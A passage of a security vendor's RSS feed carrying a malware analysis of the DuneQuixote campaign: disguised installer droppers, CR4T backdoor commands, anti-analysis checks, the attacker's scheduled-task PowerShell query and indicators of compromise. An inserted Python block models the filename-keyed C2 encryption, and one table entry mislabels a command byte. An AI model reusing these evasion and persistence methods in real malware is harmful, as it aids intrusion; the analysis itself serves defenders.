  1398. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22071148/sl_toddy_cat_palm_civet_in_a_digital_tube_photoreal-300x188.jpg" width="300" height="188"><media:keywords>medium</media:keywords></media:content>
  1399. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22071148/sl_toddy_cat_palm_civet_in_a_digital_tube_photoreal-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1400. </item>
  1401. <item>
  1402. <title>DuneQuixote campaign targets Middle Eastern entities with &#8220;CR4T&#8221; malware</title>
  1403. <link>https://securelist.com/dunequixote/112425/</link>
  1404. <comments>https://securelist.com/dunequixote/112425/#respond</comments>
  1405. <dc:creator><![CDATA[GReAT]]></dc:creator>
  1406. <pubDate>Thu, 18 Apr 2024 10:00:07 +0000</pubDate>
  1407. <category><![CDATA[APT reports]]></category>
  1408. <category><![CDATA[APT]]></category>
  1409. <category><![CDATA[Backdoor]]></category>
  1410. <category><![CDATA[Dropper]]></category>
  1411. <category><![CDATA[DuneQuixote]]></category>
  1412. <category><![CDATA[Malware]]></category>
  1413. <category><![CDATA[Malware Descriptions]]></category>
  1414. <category><![CDATA[Malware Technologies]]></category>
  1415. <category><![CDATA[Middle East]]></category>
  1416. <category><![CDATA[Targeted attacks]]></category>
  1417. <category><![CDATA[Trojan]]></category>
  1418. <category><![CDATA[APT (Targeted attacks)]]></category>
  1419. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112425</guid>
  1420.  
  1421. <description><![CDATA[New unattributed DuneQuixote campaign targeting entities in the Middle East employs droppers disguised as Total Commander installer and CR4T backdoor in C and Go.]]></description>
  1422. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17203837/sl-dunequijote-apt-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="introduction">Introduction</h2>
  1423. <p>In February 2024, we discovered a new malware campaign targeting government entities in the Middle East. We dubbed it &#8220;DuneQuixote&#8221;, and our investigation uncovered over 30 DuneQuixote dropper samples actively employed in the campaign. These droppers, which come in two versions (regular droppers, and tampered installer files for the legitimate tool &#8220;Total Commander&#8221;), carry malicious code that downloads an additional payload: a backdoor we call &#8220;CR4T&#8221;. While we identified only two CR4T implants at the time of discovery, we strongly suspect that others exist, possibly completely different malware.</p>
  1424. <p>The group behind the campaign took steps to prevent collection and analysis of its implants and implemented practical and well-designed evasion methods both in network communications and in the malware code.</p>
  1425. <h2 id="initial-dropper">Initial dropper</h2>
  1426. <p>The initial dropper is a Windows x64 executable file, although there are also DLL versions of the malware sharing the same functionality. The malware is developed in C/C++ without utilizing the Standard Template Library (STL), and certain segments are coded in pure Assembler. All samples contain digital signatures, which are, however, invalid.</p>
  1427. <p>Upon execution, the malware initiates a series of decoy API calls that serve no practical purpose. These calls primarily involve string comparison functions, executed without any conditional jumps based on the comparison results.</p>
  1428. <div id="attachment_112428" style="width: 805px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112428" class="size-full wp-image-112428" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01.png" alt="Useless function calls" width="795" height="417" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01.png 795w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01-300x157.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01-768x403.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01-667x350.png 667w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01-740x388.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01-534x280.png 534w" sizes="(max-width: 795px) 100vw, 795px" /></a><p id="caption-attachment-112428" class="wp-caption-text">Useless function calls</p></div>
  1429. <p>The strings passed to these functions are snippets from Spanish poems. They vary from one sample to another, which changes each sample&#8217;s signature and defeats traditional signature-based detection. After the decoy functions have run, the malware builds a structure for the API calls it needs, populated with the addresses of Windows API functions resolved with several techniques.</p>
  1430. <p>Initially, the malware decrypts the names of essential Windows core DLLs using a straightforward XOR decryption algorithm. It employs multiple decryption functions to decode strings, where a single function might decrypt several strings. However, in our analysis, we observed samples where each string was decrypted using a dedicated function, each employing a slightly varied decryption algorithm.</p>
  1431. <div id="attachment_112429" style="width: 605px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122633/Dune_Quixote_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112429" class="size-full wp-image-112429" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122633/Dune_Quixote_02.png" alt="String decryption algorithm" width="595" height="373" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122633/Dune_Quixote_02.png 595w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122633/Dune_Quixote_02-300x188.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122633/Dune_Quixote_02-558x350.png 558w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122633/Dune_Quixote_02-447x280.png 447w" sizes="(max-width: 595px) 100vw, 595px" /></a><p id="caption-attachment-112429" class="wp-caption-text">String decryption algorithm</p></div>
  1432. <p>Once the necessary strings have been decrypted, the malware uses a standard technique for dynamically resolving API calls to obtain their memory offsets by:</p>
  1433. <ul>
  1434. <li>retrieving the offset of the Process Environment Block (PEB);</li>
  1435. <li>locating the export table offset of <em>kernel32.dll</em>;</li>
  1436. <li>identifying the offset for the GetProcAddress function.</li>
  1437. </ul>
  1438. <p>In the process of obtaining the PEB offset, the malware first decrypts the constant <em>0x60</em>, which is the offset of the PEB pointer within the TEB (read via <em>gs:[0x60]</em> on x64) and is used to locate the PEB64 structure. This is of particular interest because malicious samples or shellcode that use this technique typically hardcode the constant in plain text.</p>
  1439. <div id="attachment_112430" style="width: 436px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122701/Dune_Quixote_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112430" class="size-full wp-image-112430" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122701/Dune_Quixote_03.png" alt="Getting PEB structure offset" width="426" height="88" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122701/Dune_Quixote_03.png 426w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122701/Dune_Quixote_03-300x62.png 300w" sizes="(max-width: 426px) 100vw, 426px" /></a><p id="caption-attachment-112430" class="wp-caption-text">Getting PEB structure offset</p></div>
  1440. <p>Next, the malware begins to populate the previously created structure with the offsets of all required functions.</p>
  1441. <p>The dropper then proceeds to decrypt the C2 (Command and Control) address, employing a unique technique designed to prevent the exposure of the C2 to automated malware analysis systems. This method involves first retrieving the filename under which the dropper was executed, then concatenating this filename with one of the hardcoded strings from Spanish poems. Following this, the dropper calculates the MD5 hash of the concatenated string, which is then used as a key for decrypting the C2 string.</p>
  1442. <div id="attachment_112431" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112431" class="size-large wp-image-112431" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-1024x171.png" alt="C2 decryption algorithm" width="1024" height="171" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-1024x171.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-300x50.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-768x128.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-1536x256.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-740x124.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-800x134.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04.png 1545w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112431" class="wp-caption-text">C2 decryption algorithm</p></div>
  1443. <p>Following the decryption of the C2 string, the malware attempts to establish a connection with the C2 server using a specifically hardcoded ID as the user agent to download the payload. During our research of the C2 infrastructure, we found that the payload remains inaccessible for download unless the correct user agent is provided. Furthermore, it appears that the payload may only be downloaded once per victim or is only available for a brief period following the release of a malware sample into the wild, as we were unable to obtain most of the payload implants from active C2 servers.</p>
  1444. <p>Once the payload is downloaded into the process&#8217;s memory, the dropper performs a verification check for the &#8220;M&#8221; (<em>0x4D</em> in hexadecimal) magic byte at the start of the memory blob. This check likely serves to confirm that the payload has an MZ file signature, thereby indicating it is a valid executable format.</p>
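The filename-bound C2 derivation described above, modelled as an added example (editor's code, not DuneQuixote's), to show why a sandbox that renames the sample never recovers the C2 and what an analyst can do about it. The report states only the key derivation (MD5 of the filename the dropper ran as, concatenated with the hardcoded poem snippet); the cipher that consumes that key is not given, so a repeating XOR with the 16-byte digest is used here as an assumed stand-in. The poem snippet, filenames and C2 URL are constructed.

```python
import hashlib
import string

POEM_SNIPPET = "En un lugar de la Mancha"   # constructed stand-in for the hardcoded poem string
PRINTABLE = set(string.printable) - set("\t\n\r\x0b\x0c")


def derive_key(run_as_filename: str, snippet: str = POEM_SNIPPET) -> bytes:
    """Key = MD5(filename + poem snippet), as the report describes."""
    return hashlib.md5((run_as_filename + snippet).encode("utf-8")).digest()


def xor_stream(data: bytes, key: bytes) -> bytes:
    """Assumed cipher (not from the report): repeating XOR with the 16-byte digest."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def seal_c2(c2_url: str, run_as_filename: str) -> bytes:
    """Author side: what gets embedded in a sample meant to run under this filename."""
    return xor_stream(c2_url.encode("ascii"), derive_key(run_as_filename))


def open_c2(blob: bytes, run_as_filename: str) -> bytes:
    """Dropper side: garbage unless the sample kept its intended filename."""
    return xor_stream(blob, derive_key(run_as_filename))


def looks_like_url(candidate: bytes) -> bool:
    try:
        text = candidate.decode("ascii")
    except UnicodeDecodeError:
        return False
    return text.startswith(("http://", "https://")) and all(c in PRINTABLE for c in text)


def recover_c2(blob: bytes, candidate_names):
    """Analyst side: try the filenames seen in the lure or the submission until a URL appears."""
    for name in candidate_names:
        plaintext = open_c2(blob, name)
        if looks_like_url(plaintext):
            return name, plaintext.decode("ascii")
    return None


def demo() -> dict:
    blob = seal_c2("https://c2.example.invalid/update", "TotalCommander_setup.exe")   # constructed
    sandbox_view = open_c2(blob, "sample.exe")   # a sandbox that renamed the file
    return {
        "sandbox_is_url": looks_like_url(sandbox_view),
        "recovered": recover_c2(blob, ["sample.exe", "malware.bin", "TotalCommander_setup.exe"]),
    }


if __name__ == "__main__":
    print(demo())
```

The practical consequence for triage is that the original attachment or download name is part of the key material: a sample submitted as <code>sample.exe</code> or by its hash needs the lure's filename (from the mail gateway log, proxy log or the victim's disk) before the C2 can be recovered, and the <code>recover_c2</code> loop is the cheap way to test the handful of candidates that usually exist.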
  1445. <h2 id="total-commander-installer-dropper">Total Commander installer dropper</h2>
  1446. <p>The Total Commander installer dropper is created to mimic a <a href="https://www.ghisler.com/" target="_blank" rel="noopener">legitimate Total Commander</a> software installer. It is, in fact, the legitimate installer file, but with an added malicious file section (<em>.textbss</em>) and a modified entry point. This tampering invalidates the official digital signature of the Total Commander installer.</p>
  1447. <p>The installer dropper retains the core functionality of the initial dropper but with several key differences. Unlike the original dropper, it omits the use of Spanish poem strings and the execution of decoy functions. It also implements a series of anti-analysis measures and checks that prevent a connection to C2 resources if any of the following conditions are true:</p>
  1448. <ul>
  1449. <li>a debugger is present in the system;</li>
  1450. <li>known research or monitoring tools are among running processes;</li>
  1451. <li>the <em>explorer.exe</em> process has more than two instances;</li>
  1452. <li>any of the following processes are running:
  1453. <ul>
  1454. <li>&#8220;python.exe&#8221;</li>
  1455. <li>&#8220;taskmgr.exe&#8221;</li>
  1456. <li>&#8220;procmon.exe&#8221;</li>
  1457. <li>&#8220;resmon.exe&#8221;</li>
  1458. <li>&#8220;eventvwr.exe&#8221;</li>
  1459. <li>&#8220;process_hacker.exe&#8221;</li>
  1460. </ul>
  1461. </li>
  1462. <li>less than 8 GB RAM available;</li>
  1463. <li>the position of the cursor does not change over a certain timeframe;</li>
  1464. <li>disk capacity is less than 40 GB.</li>
  1465. </ul>
  1466. <p>If any of the anti-analysis checks fail, the malware returns a value of 1. This specific return value plays a role in the decryption of the C2 server address. It triggers the removal of the first &#8220;h&#8221; from the beginning of the C2 URL (&#8220;<em>https</em>&#8221;), effectively changing it to &#8220;<em>ttps</em>&#8221;. As a result, the altered URL prevents the establishment of a connection to the C2 server.</p>
  1467. <h2 id="memory-only-cr4t-implant">Memory-only CR4T implant</h2>
  1468. <p>The &#8220;CR4T&#8221; implant is designed with the primary goal of granting attackers access to a console for command line execution on the victim&#8217;s machine. Additionally, it facilitates the download, upload, and modification of files. The malware carries a PDB string in its code:</p><pre class="crayon-plain-tag">"C:\Users\user\Desktop\code\CR4T\x64\Release\CR4T.pdb"</pre><p>
  1469. That&#8217;s why we dubbed it &#8220;CR4T&#8221;.</p>
  1470. <p>Upon execution by the dropper, the implant initiates a <em>cmd.exe</em> process in a hidden window and establishes two named pipes to enable inter-process communication. It then configures the user agent for communication with the C2 server, embedding the hardcoded value &#8220;TroubleShooter&#8221; as the user agent name for requests to the C2.</p>
  1471. <div id="attachment_112432" style="width: 664px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122917/Dune_Quixote_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112432" class="size-full wp-image-112432" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122917/Dune_Quixote_05.png" alt="User-agent string" width="654" height="132" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122917/Dune_Quixote_05.png 654w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122917/Dune_Quixote_05-300x61.png 300w" sizes="(max-width: 654px) 100vw, 654px" /></a><p id="caption-attachment-112432" class="wp-caption-text">User-agent string</p></div>
  1472. <p>After that, the implant retrieves the computer name of the infected host as well as the username of the current user. Then it establishes a connection to the C2 server. This session provides interactive access to the command line interface of the victim&#8217;s machine via the earlier mentioned named pipes. Commands and their outputs are encoded using Base64 before being sent and decoded after receiving.</p>
  1473. <p>After establishing the connection, the implant remains idle, awaiting an initial command from the C2 operator to activate the required functionality. This command is represented by a one-byte value, with each value mapped to a specific action on the infected system. These single-character commands would likely make more sense to an English-speaking developer/operator than to a Spanish-speaking one, e.g. &#8220;D&#8221; == Download, &#8220;U&#8221; == Upload (where a Spanish speaker might use &#8220;Cargar&#8221;).</p>
  1474. <table width="100%">
  1475. <tbody>
  1476. <tr>
  1477. <td width="25%"><strong>Command</strong></td>
  1478. <td width="75%"><strong>Functionality</strong></td>
  1479. </tr>
  1480. <tr>
  1481. <td>&#8216;C&#8217; (0x43)</td>
  1482. <td>Provide access to the command line interface via a named pipe.</td>
  1483. </tr>
  1484. <tr>
  1485. <td>&#8216;D&#8217; (0x44)</td>
  1486. <td>Download file from the C2</td>
  1487. </tr>
  1488. <tr>
  1489. <td>&#8216;U&#8217; (0x55)</td>
  1490. <td>Upload file to the C2</td>
  1491. </tr>
  1492. <tr>
  1493. <td>&#8216;S&#8217; (0x53)</td>
  1494. <td>Sleep</td>
  1495. </tr>
  1496. <tr>
  1497. <td>&#8216;R&#8217; (0x52)</td>
  1498. <td>Exit process</td>
  1499. </tr>
  1500. <tr>
  1501. <td>&#8216;T&#8217; (0x57)</td>
  1502. <td>Write to a file (T here possibly stands for a file-write <em>task</em>)</td>
  1503. </tr>
  1504. </tbody>
  1505. </table>
  1506. <p>During our investigation, we discovered evidence of a PowerShell file that had been created using the &#8220;T&#8221; command:</p><pre class="crayon-plain-tag">"powershell -c \"Get-ScheduledTask | Where-Object {$_.TaskName -like 'User_Feed_Sync*' -and $_.State -eq 'Running'} | Select-Object TaskName\"</pre><p>
  1507. The threat actor was observed attempting to retrieve the names of all scheduled tasks on the infected machine beginning with &#8220;<em>User_Feed_Sync</em>&#8220;. These scheduled tasks were probably created by the Golang version of CR4T for persistence purposes.</p>
  1508. <h2 id="memory-only-golang-cr4t-implant">Memory-only Golang CR4T implant</h2>
  1509. <p>We also discovered a Golang version of the CR4T implant, which shares similar capabilities with the C version and has a similar string related to the internal naming:</p>
  1510. <pre class="crayon-plain-tag">"C:/Users/user/Desktop/code/Cr4tInst/main.go"</pre>
  1511. <p>This variant provides a command line console for interaction with infected machines, as well as file download and upload capabilities. It also possesses the functionality to execute commands on the victim&#8217;s machine. A notable difference of this version is its ability to create scheduled tasks using the Golang <a href="https://github.com/go-ole/go-ole">Go-ole</a> library. This library leverages Windows Component Object Model (COM) object interfaces for interacting with the Task Scheduler service.</p>
  1512. <div id="attachment_112433" style="width: 716px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17123128/Dune_Quixote_06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112433" class="size-full wp-image-112433" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17123128/Dune_Quixote_06.png" alt=" CR4T using go-ole library" width="706" height="447" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17123128/Dune_Quixote_06.png 706w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17123128/Dune_Quixote_06-300x190.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17123128/Dune_Quixote_06-553x350.png 553w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17123128/Dune_Quixote_06-442x280.png 442w" sizes="(max-width: 706px) 100vw, 706px" /></a><p id="caption-attachment-112433" class="wp-caption-text">CR4T using go-ole library</p></div>
  1513. <p>The malware is also capable of achieving persistence by utilizing the <a href="https://cyberstruggle.org/2021/12/14/com-hijacking-for-persistence/" target="_blank" rel="noopener">COM object hijacking</a> technique. Finally, it uses the Telegram API for C2 communications, implementing the public <a href="https://github.com/go-telegram-bot-api/telegram-bot-api" target="_blank" rel="noopener">Golang Telegram API</a> bindings. All the interactions are similar to those of the C/C++ version.</p>
  1514. <h2 id="infrastructure">Infrastructure</h2>
  1515. <p>The infrastructure used in this campaign appears to be located in the US at two different commercial hosters.</p>
  1516. <table width="100%">
  1517. <tbody>
  1518. <tr>
  1519. <td width="28%"><strong>Domain</strong></td>
  1520. <td width="28%"><strong>IP</strong></td>
  1521. <td width="28%"><strong>First seen</strong></td>
  1522. <td width="16%"><strong>ASN</strong></td>
  1523. </tr>
  1524. <tr>
  1525. <td>commonline[.]space</td>
  1526. <td>135.148.113[.]161</td>
  1527. <td>2023-12-16 23:20</td>
  1528. <td>16276</td>
  1529. </tr>
  1530. <tr>
  1531. <td>userfeedsync[.]com</td>
  1532. <td>104.36.229[.]249</td>
  1533. <td>2024-01-10 07:27</td>
  1534. <td>395092</td>
  1535. </tr>
  1536. </tbody>
  1537. </table>
  1538. <h2 id="victims">Victims</h2>
  1539. <p>We discovered victims in the Middle East, as per our telemetry, as early as February 2023. Additionally, there were several uploads to a semi-public malware scanning service at a later stage, more specifically starting on December 12, 2023, with more than 30 submissions of the droppers in the period up to the end of January 2024. The majority of these uploads also originated from the Middle East. The other sources, which we suspect to be VPN exit nodes, were geo-located in South Korea, Luxembourg, Japan, Canada, the Netherlands and the US.</p>
  1540. <h2 id="conclusions">Conclusions</h2>
  1541. <p>The &#8220;DuneQuixote&#8221; campaign targets entities in the Middle East with an interesting array of tools designed for stealth and persistence. Through the deployment of memory-only implants and droppers masquerading as legitimate software, mimicking the Total Commander installer, the attackers demonstrate above average evasion capabilities and techniques. The discovery of both C/C++ and Golang versions of the CR4T implant highlights the adaptability and resourcefulness of the threat actors behind this campaign.</p>
  1542. <h2 id="indicators-of-compromise">Indicators of Compromise</h2>
  1543. <p><strong>DuneQuixote Droppers</strong><br />
  1544. <a href="https://opentip.kaspersky.com/3aaf7f7f0a42a1cf0a0f6c61511978d7/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">3aaf7f7f0a42a1cf0a0f6c61511978d7</a><br />
  1545. <a href="https://opentip.kaspersky.com/5759acc816274d38407038c091e56a5c/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">5759acc816274d38407038c091e56a5c</a><br />
  1546. <a href="https://opentip.kaspersky.com/606fdee74ad70f76618007d299adb0a4/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">606fdee74ad70f76618007d299adb0a4</a><br />
  1547. <a href="https://opentip.kaspersky.com/5a04d9067b8cb6bcb916b59dcf53bed3/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">5a04d9067b8cb6bcb916b59dcf53bed3</a><br />
  1548. <a href="https://opentip.kaspersky.com/48c8e8cc189eef04a55ecb021f9e6111/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">48c8e8cc189eef04a55ecb021f9e6111</a><br />
  1549. <a href="https://opentip.kaspersky.com/7b9e85afa89670f46f884bb3bce262b0/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">7b9e85afa89670f46f884bb3bce262b0</a><br />
  1550. <a href="https://opentip.kaspersky.com/4f29f977e786b2f7f483b47840b9c19d/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">4f29f977e786b2f7f483b47840b9c19d</a><br />
  1551. <a href="https://opentip.kaspersky.com/9d20cc7a02121b515fd8f16b576624ef/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">9d20cc7a02121b515fd8f16b576624ef</a><br />
  1552. <a href="https://opentip.kaspersky.com/4324cb72875d8a62a210690221cdc3f9/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">4324cb72875d8a62a210690221cdc3f9</a><br />
  1553. <a href="https://opentip.kaspersky.com/3cc77c18b4d1629b7658afbf4175222c/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">3cc77c18b4d1629b7658afbf4175222c</a><br />
  1554. <a href="https://opentip.kaspersky.com/6cfec4bdcbcf7f99535ee61a0ebae5dc/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">6cfec4bdcbcf7f99535ee61a0ebae5dc</a><br />
  1555. <a href="https://opentip.kaspersky.com/c70763510953149fb33d06bef160821c/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">c70763510953149fb33d06bef160821c</a><br />
  1556. <a href="https://opentip.kaspersky.com/f3988b8aaaa8c6a9ec407cf5854b0e3b/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">f3988b8aaaa8c6a9ec407cf5854b0e3b</a><br />
  1557. <a href="https://opentip.kaspersky.com/cf4bef8537c6397ba07de7629735eb4e/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">cf4bef8537c6397ba07de7629735eb4e</a><br />
  1558. <a href="https://opentip.kaspersky.com/1bba771b9a32f0aada6eaee64643673a/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">1bba771b9a32f0aada6eaee64643673a</a><br />
  1559. <a href="https://opentip.kaspersky.com/72c4d9bc1b59da634949c555b2a594b1/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">72c4d9bc1b59da634949c555b2a594b1</a><br />
  1560. <a href="https://opentip.kaspersky.com/cc05c7bef5cff67bc74fda2fc96ddf7b/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">cc05c7bef5cff67bc74fda2fc96ddf7b</a><br />
  1561. <a href="https://opentip.kaspersky.com/0fdbe82d2c8d52ac912d698bb8b25abc/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">0fdbe82d2c8d52ac912d698bb8b25abc</a><br />
  1562. <a href="https://opentip.kaspersky.com/9b991229fe1f5d8ec6543b1e5ae9beb4/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">9b991229fe1f5d8ec6543b1e5ae9beb4</a><br />
  1563. <a href="https://opentip.kaspersky.com/5e85dc7c6969ce2270a06184a8c8e1da/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">5e85dc7c6969ce2270a06184a8c8e1da</a><br />
  1564. <a href="https://opentip.kaspersky.com/71a8b4b8d9861bf9ac6bd4b0a60c3366/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">71a8b4b8d9861bf9ac6bd4b0a60c3366</a><br />
  1565. <a href="https://opentip.kaspersky.com/828335d067b27444198365fac30aa6be/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">828335d067b27444198365fac30aa6be</a><br />
  1566. <a href="https://opentip.kaspersky.com/84ae9222c86290bf585851191007ba23/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">84ae9222c86290bf585851191007ba23</a><br />
  1567. <a href="https://opentip.kaspersky.com/450e589680e812ffb732f7e889676385/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">450e589680e812ffb732f7e889676385</a><br />
  1568. <a href="https://opentip.kaspersky.com/56d5589e0d6413575381b1f3c96aa245/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">56d5589e0d6413575381b1f3c96aa245</a><br />
  1569. <a href="https://opentip.kaspersky.com/258b7f20db8b927087d74a9d6214919b/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">258b7f20db8b927087d74a9d6214919b</a><br />
  1570. <a href="https://opentip.kaspersky.com/a4011d2e4d3d9f9fe210448dd19c9d9a/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">a4011d2e4d3d9f9fe210448dd19c9d9a</a><br />
  1571. <a href="https://opentip.kaspersky.com/b0e19a9fd168af2f7f6cf997992b1809/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">b0e19a9fd168af2f7f6cf997992b1809</a><br />
  1572. <a href="https://opentip.kaspersky.com/0d740972c3dff09c13a5193d19423da1/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">0d740972c3dff09c13a5193d19423da1</a><br />
  1573. <a href="https://opentip.kaspersky.com/a0802a787537de1811a81d9182be9e7c/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">a0802a787537de1811a81d9182be9e7c</a><br />
  1574. <a href="https://opentip.kaspersky.com/5200fa68b6d40bb60d4f097b895516f0/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">5200fa68b6d40bb60d4f097b895516f0</a><br />
  1575. <a href="https://opentip.kaspersky.com/abf16e31deb669017e10e2cb8cc144c8/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">abf16e31deb669017e10e2cb8cc144c8</a><br />
  1576. <a href="https://opentip.kaspersky.com/f151be4e882352ec42a336ca6bff7e3d/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">f151be4e882352ec42a336ca6bff7e3d</a><br />
  1577. <a href="https://opentip.kaspersky.com/f1b6aa55ba3bb645d3fde78abda984f3/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">f1b6aa55ba3bb645d3fde78abda984f3</a><br />
  1578. <a href="https://opentip.kaspersky.com/00130e1e7d628c8b5e2f9904ca959cd7/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">00130e1e7d628c8b5e2f9904ca959cd7</a><br />
  1579. <a href="https://opentip.kaspersky.com/fb2b916e44abddd943015787f6a8dc35/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">fb2b916e44abddd943015787f6a8dc35</a><br />
